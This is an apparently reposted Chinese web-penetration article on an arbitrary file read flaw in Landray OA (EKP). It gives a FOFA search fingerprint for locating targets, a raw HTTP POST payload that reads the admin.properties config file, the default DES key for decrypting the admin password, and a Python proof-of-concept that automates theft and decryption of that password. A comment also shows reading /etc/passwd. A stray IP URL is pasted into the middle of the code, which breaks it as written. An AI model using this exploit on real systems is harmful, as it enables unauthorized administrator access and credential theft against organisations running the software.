碼上快樂

相關內容    簡體    繁體

藍凌OA后台密碼讀解密+POC

本文轉載自   查看原文   2021-06-15 09:23   825    WEB滲透/ WEB/ 藍凌OA

漏洞描述

藍凌OA(EKP)存在任意文件讀取漏洞。可利用漏洞獲取敏感信息,讀取配置文件得到密碼后訪問后台
http://x.x.x.x/admin.do

漏洞影響版本

藍凌OA

FOFA

app="Landray-OA系統"

漏洞復現過程

利用custom.jsp任意文件讀取漏洞來讀取配置文件

Payload如下:

請求:http://x.x.x.x/sys/ui/extend/varkind/custom.jsp
讀取配置文件:/WEB-INF/KmssConfig/admin.properties,此處需要寫為如下格式:
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

在BurpSuite上的數據包如下:

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

接着可以將得到的密鑰:JMK83aAgUCrm2fHdvJWIEQ== 拿去DES在線解密網站進行解密

默認密鑰:kmssAdminKey

在線解密網站:

http://tool.chacuo.net/cryptdes

接着拿着解密后的密鑰去后台進行登錄:

后台:http://x.x.x.x/admin.do

POC

# -*- coding: utf-8 -*-
# @Author: Adura
# @Date:   2021-06-09 10:54:47
# @Last Modified by:   chenw
# @Last Modified time: 2021-06-09 11:03:01
import requests
import sys
import re
import base64
from pyDes import des, ECB, PAD_PKCS5
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def title():
    print('+-------------------------------------------------')
    print('+  \033[31mPOC_by: Chenw                   \033[0m')
    print('+  \033[31m漏洞名稱: 藍凌OA任意文件讀取         \033[0m')
    print('+  \033[36m使用格式:  python3 Poc.py         \033[0m')
    print('+  \033[36m請輸入URL: >>> http://ip:端口     \033[0m')
    print('+-------------------------------------------------')


def POC(url): 
    url1 =url
    url2 =url1+'/sys/ui/extend/varkind/custom.jsp'
    headers={
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded"
            }
    data='var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'

    #data='var={"body":{"file":"file:///etc/passwd"}}'
    try:
        r = requests.post(url=url2,headers=headers,data=data,verify=False,timeout=10)
        if r.status_code == 200 and 'password' in r.text:
            print(url+'存在藍凌OA SSRF漏洞')
            print('登錄地址:'+url+'/admin.do')
            data = r.text.strip()
            data =str(data)
            data1 = data.split()
            data2 = ''.join(data1)
            password = re.findall(r"password=(.*?)\\rkmss",data2,re.I | re.M)
            password1 = str(password)
            KEY = 'kmssAdmi'
            try:
                secret_key = KEY
                iv = secret_key
                k = des(secret_key, ECB, iv, pad=None, padmode=PAD_PKCS5)
                decrystr = k.decrypt(base64.b64decode(password1))
                decrystr2 = str(decrystr, 'utf-8').strip(':')
                print('&*****&'+'后台密碼為:' + decrystr2)
            except Exception as e:
                print('解密失敗')

        else:http://8.129.43.243:8081/
            print(url+'\033[31m[x] 不存在漏洞 \033[0m')

    except Exception as e:
        print(url+'異常退出')	

if __name__ == '__main__':
	title()
	url = str(input("\033[35m請輸入攻擊目標的Url \nUrl >>> \033[0m"))
	POC(url)

使用Poc解密如下:

免責聲明

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 藍凌OA任意寫入漏洞 藍凌OA常用表整理 【漏洞復現】藍凌OA近期公開幾個漏洞匯總 藍凌OA前台任意文件讀取漏洞利用 藍凌OA二次開發手冊 X凌OA系統任意文件讀取-DES解密 泛微 E9產品 服務端技術 與 藍凌 OA 產品技術 致遠OA利用POC 通達OA后台getshell 通達OA 11.6 RCE 漏洞(含EXP,POC,環境)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM